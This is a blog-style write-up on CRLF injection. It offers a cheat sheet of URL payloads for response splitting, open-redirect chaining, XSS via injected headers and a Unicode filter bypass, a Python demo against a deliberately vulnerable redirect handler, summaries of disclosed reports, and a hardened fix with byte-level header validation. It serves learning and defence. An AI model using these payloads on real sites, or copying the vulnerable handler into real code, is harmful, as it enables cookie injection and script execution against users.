CRLF Injection Playbook
Hello guys, just a rough analysis of publicly disclosed bugs about CRLF injection

This analysis was done purely out of curiosity about learning new things, and I found this topic interesting, so I thought of sharing it with you guys. I started by reading disclosed reports about CRLF injection on HackerOne Hacktivity. (Some interesting reports are discussed below.)
Getting Started
Now, What is CRLF?
Line feed = \n (%0a)
Carriage Return = \r (%0d)
Basically, pressing the Enter key in a Windows text editor inserts the combination carriage return + line feed. Windows editors mostly use \r\n; Unix mostly uses \n. HTTP itself uses \r\n (CRLF) to end the status line and every header line, which is why the pair matters for web security.
Diggin’ into Injection and Attack Vector
What is CRLF Injection?
A Carriage Return Line Feed (CRLF) injection vulnerability occurs when an application does not sanitize user input correctly and allows carriage return and line feed characters into a place where they have special meaning. For many internet protocols, including HTTP, these characters denote line breaks: the parsing of an HTTP message relies on CRLF sequences (%0D%0A, which decode to \r\n) to delimit the request/status line, each header, and the end of the header block. Reference:
Attacks that grow out of CRLF injection include HTTP response splitting (the attacker's CRLF turns one response header into extra headers, or even a second response body) and, in some setups, HTTP request smuggling. (Detailing them is out of the scope of this blog; maybe I will discuss them in the next post.)
Starting The Research
I started with HackerOne Hacktivity and searched for CRLF injection, which gave me "only" 59 results

That doesn't mean there are only 59 publicly disclosed reports on CRLF injection, so I asked my best friend (Google) about CRLF injection reports. It gave me 80 results about CRLF

And after some time my browser was filled with CRLF Injection reports

And in all the reports above I found that CRLF injection is most commonly done by modifying an HTTP parameter or the URL path.
Going through all the reports and write-ups, I created a cheat sheet for CRLF injection, which is as follows:
CHEATSHEET
1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue
2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
These are the UTF-8 encodings of CJK characters whose low byte is the control character you want. A filter that only looks for %0A/%0D lets them through, and if the server later narrows the decoded character to a single byte (a lossy charset conversion), the low byte is what ends up in the header.
• %E5%98%8A = U+560A (\u560a), low byte 0x0A = \n (%0A)
• %E5%98%8D = U+560D (\u560d), low byte 0x0D = \r (%0D)
• %E5%98%BE = U+563E (\u563e), low byte 0x3E = > (%3E)
• %E5%98%BC = U+563C (\u563c), low byte 0x3C = < (%3C)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
Result And Analysis

Most CRLF injections can be chained into XSS or an open redirect if the injected headers are chosen properly. Chaining raises the real impact of the finding, and you can usually escalate a report from Low to a Medium CVSS score that way.
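To see what each cheat-sheet entry actually buys the attacker, here is an added example (my code, not from the original post or from any of the reports it cites) that feeds the payloads into a deliberately vulnerable toy redirect handler and parses the resulting response the way a lenient HTTP client would. The host app.example, the handler, and the narrow_to_one_byte conversion that stands in for the Twitter-style charset bug are all assumptions made for the demo; the payloads are copied from the cheat sheet. The toy treats the whole path as the redirect target, so the %3f in the XSS payload just lands in the Location value instead of starting a query string.

```python
"""Replay the cheat-sheet payloads against a deliberately vulnerable redirect handler and
parse the resulting response the way a lenient HTTP client would, to see exactly which
headers and how much of the body the attacker ends up controlling."""
import re
from urllib.parse import unquote

# Payloads taken from the cheat sheet above, still percent-encoded as they would be in a URL.
PAYLOADS = {
    "response_splitting": "/%0D%0ASet-Cookie:mycookie=myvalue",
    "redirect_chain": "//www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2",
    "location_override": "/%0d%0aLocation:%20http://example.com",
    "xss": ("/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0"
            "%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E"),
    "unicode_bypass": "/%E5%98%8A%E5%98%8DSet-Cookie:%20test",
}


def narrow_to_one_byte(text: str) -> str:
    """Hypothetical lossy charset conversion that keeps only the low byte of each code
    point. It models the class of bug behind the Twitter report: U+560A becomes 0x0A (LF)
    and U+560D becomes 0x0D (CR), so input that contained no CR/LF suddenly does."""
    return "".join(chr(ord(c) & 0xFF) for c in text)


def vulnerable_redirect(path: str, lossy_charset: bool = False) -> str:
    """Toy redirect endpoint on an assumed host (app.example). The decoded path is
    concatenated straight into the Location header with no CR/LF check: deliberately
    vulnerable, this is the pattern the reports above exploit."""
    decoded = unquote(path)                     # %0D%0A -> "\r\n", %E5%98%8A -> U+560A
    if lossy_charset:
        decoded = narrow_to_one_byte(decoded)
    location = "https://app.example/" + decoded.lstrip("/")
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\nContent-Length: 0\r\n\r\n"


HEAD_END = re.compile(r"\r?\n\r?\n")            # first blank line ends the header block
LINE_BREAK = re.compile(r"\r\n|\n|\r")          # bare LF/CR accepted, as lenient parsers do


def parse_response(raw: str):
    """Split a raw response into (status line, [(name, value), ...], body).
    Bare LF or CR is accepted as a line break, as many real HTTP parsers do; a strict
    CRLF-only parser would not split on the LF+CR pair that the narrowing bug produces."""
    m = HEAD_END.search(raw)
    head, body = (raw[:m.start()], raw[m.end():]) if m else (raw, "")
    status, *lines = LINE_BREAK.split(head)
    headers = []
    for line in lines:
        if not line:                            # empty fragment between "\n" and "\r"
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def injected(payload: str, lossy_charset: bool = False):
    """Return (extra_headers, body): the headers the attacker added, i.e. anything the
    server did not set itself, and whatever part of the body the attacker controls."""
    _, headers, body = parse_response(vulnerable_redirect(payload, lossy_charset))
    servers_own = {("Content-Length", "0")}
    extra = [h for h in headers
             if h not in servers_own and not h[1].startswith("https://app.example/")]
    return extra, body


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        extra, body = injected(payload, lossy_charset=(name == "unicode_bypass"))
        print(f"{name:<20} injected headers={extra} body={body[:45]!r}")
```

Two things are worth noticing when you run it. The XSS payload's second %0d%0a%0d%0a ends the header block early, so the server's own Content-Length line falls into the body along with the script, which is why that payload is a full response split and not just an extra header. And the Unicode payload injects nothing until lossy_charset is switched on: the bypass only works against a server that narrows characters after the filter has run, which is exactly the condition to look for when you try it.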
Mitigation or Fix Implementation
The fix is to never let a raw CR or LF reach a header. Either strip (or better, reject) \r and \n from user-controlled values before they are placed in a header, or encode the data (percent-encoding, for example) so that a CRLF sequence can never appear literally. Do the check on the final bytes that are written, after any charset conversion, because a check on the decoded string will pass characters that only become 0x0D/0x0A later, which is exactly the Unicode bypass from the cheat sheet. Most modern HTTP libraries already refuse header values containing CR/LF; use them rather than building headers by string concatenation, and for redirects also validate the target host so that a CRLF-free open redirect does not remain.
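As an added example of the fix (my code, not from the original post or from any framework), the following puts the two options side by side, strip versus encode, and adds the two checks a reviewer would insist on: validation of the bytes that actually go on the wire, and an allow-list for redirect targets. The allowed host app.example, the HeaderInjection exception and the helper names are assumptions made for the demo; the narrowing expression in the test mirrors the Twitter-style lossy conversion discussed above.

```python
"""Hardened header emission: validate the bytes on the wire, and never concatenate
user input into a Location header without an allow-list check."""
import re
from urllib.parse import quote, urlsplit


class HeaderInjection(ValueError):
    """Raised when a header name or value would break out of its line on the wire."""


# RFC 9110 field-value grammar: visible ASCII, SP, HTAB and obs-text (0x80-0xFF).
# CR, LF, NUL, DEL and the other control bytes are never legal inside a value.
_BAD_VALUE_BYTES = re.compile(rb"[\x00-\x08\x0a-\x1f\x7f]")
# Header names are tokens: no whitespace, no separators, and certainly no CR/LF.
_TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+\Z")


def header_line(name: str, value: bytes) -> bytes:
    """Serialise one header, validating the exact bytes that will be sent.
    Checking bytes rather than str is the point: a str check for "\\r\\n" passes
    U+560A/U+560D, but a lossy charset conversion downstream can turn them into
    0x0A/0x0D. Validate after every conversion, right before emission."""
    try:
        raw_name = name.encode("ascii")
    except UnicodeEncodeError as exc:
        raise HeaderInjection(f"non-ASCII header name {name!r}") from exc
    if not _TOKEN.match(raw_name):
        raise HeaderInjection(f"illegal header name {name!r}")
    if _BAD_VALUE_BYTES.search(value):
        raise HeaderInjection(f"control byte in value for {name}: {value!r}")
    return raw_name + b": " + value + b"\r\n"


def rejected(name: str, value: bytes) -> bool:
    """Does the validator refuse this header? (Convenience for demos and tests.)"""
    try:
        header_line(name, value)
    except HeaderInjection:
        return True
    return False


def naive_has_crlf(value: str) -> bool:
    """The check that catches the plain %0D%0A payloads but nothing that only becomes
    CR/LF after a later encoding step. Shown here as the thing NOT to rely on."""
    return "\r" in value or "\n" in value


def strip_crlf(value: str) -> str:
    """Option 1 from the text: remove the characters before they reach the header."""
    return value.replace("\r", "").replace("\n", "")


def encode_for_header(value: str) -> bytes:
    """Option 2 from the text: percent-encode so CR/LF can never appear literally.
    URL structure characters stay readable so the result is still a usable Location."""
    return quote(value, safe="/:?=&#").encode("ascii")


def is_allowed_target(target: str, allowed_hosts: frozenset) -> bool:
    """Allow-list the redirect target. Scheme-relative (//evil.example) and
    userinfo tricks (https://app.example@evil.example) both fail this check."""
    parts = urlsplit(target)
    return parts.scheme in ("http", "https") and parts.hostname in allowed_hosts


def safe_redirect(target: str, allowed_hosts: frozenset) -> bytes:
    """Redirect only to allow-listed hosts, and emit Location through the encoder and
    the byte-level validator, so a CRLF in the target is neutralised, not split on."""
    if not is_allowed_target(target, allowed_hosts):
        raise ValueError(f"refusing to redirect to {target!r}")
    head = b"HTTP/1.1 302 Found\r\n"
    head += header_line("Location", encode_for_header(target))
    head += header_line("Content-Length", b"0")
    return head + b"\r\n"


if __name__ == "__main__":
    hosts = frozenset({"app.example"})
    print(safe_redirect("https://app.example/\r\nSet-Cookie: x", hosts))
    print("naive check sees CRLF in Unicode payload:",
          naive_has_crlf("\u560a\u560dSet-Cookie: test"))
    narrowed = bytes(ord(c) & 0xFF for c in "\u560a\u560dSet-Cookie: test")
    print("byte-level validator rejects narrowed payload:", rejected("Location", narrowed))
```

If you use a real HTTP library you get the byte-level check for free: Python's http.client raises ValueError for a header value containing a bare CR or LF, and Node's http module throws ERR_INVALID_CHAR. What no library does for you is the allow-list, so keep is_allowed_target even when header_line is redundant.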
That was all about the attack vector and my research on CRLF injection. Now let's look at some publicly available payloads and discuss some interesting reports.
Payloads
Interesting Reports
1. Twitter HTTP Response Splitting
In April 2015, filedescriptor reported this vulnerability to Twitter. It allowed an attacker to set an arbitrary cookie by tacking additional data onto an HTTP request: he passed %E5%98%8A%E5%98%8DSet-Cookie:%20test, which Twitter turned into %0A and %0D inside the header, and he received Set-Cookie: test back from Twitter.
Conclusion: When you are looking for vulnerabilities, always remember to think outside the box and submit encoded values to see how the site handles the input.
2. HTTP Response Splitting (CRLF injection) due to headers overflow
To know in detail about this report, filedescriptor himself has published a blog
3. v.shopify.com Response Splitting
THE END
During this process, I definitely learned new things and now I feel like I have much more knowledge than before about CRLF injection and have a good intuition of finding some new vulnerability.
So, Until Next Blog
Best of luck everyone. Keep-Hacking!
Feedbacks and edits are welcome
If you enjoyed this blog, please click the 👏 button and share it to help others find it.





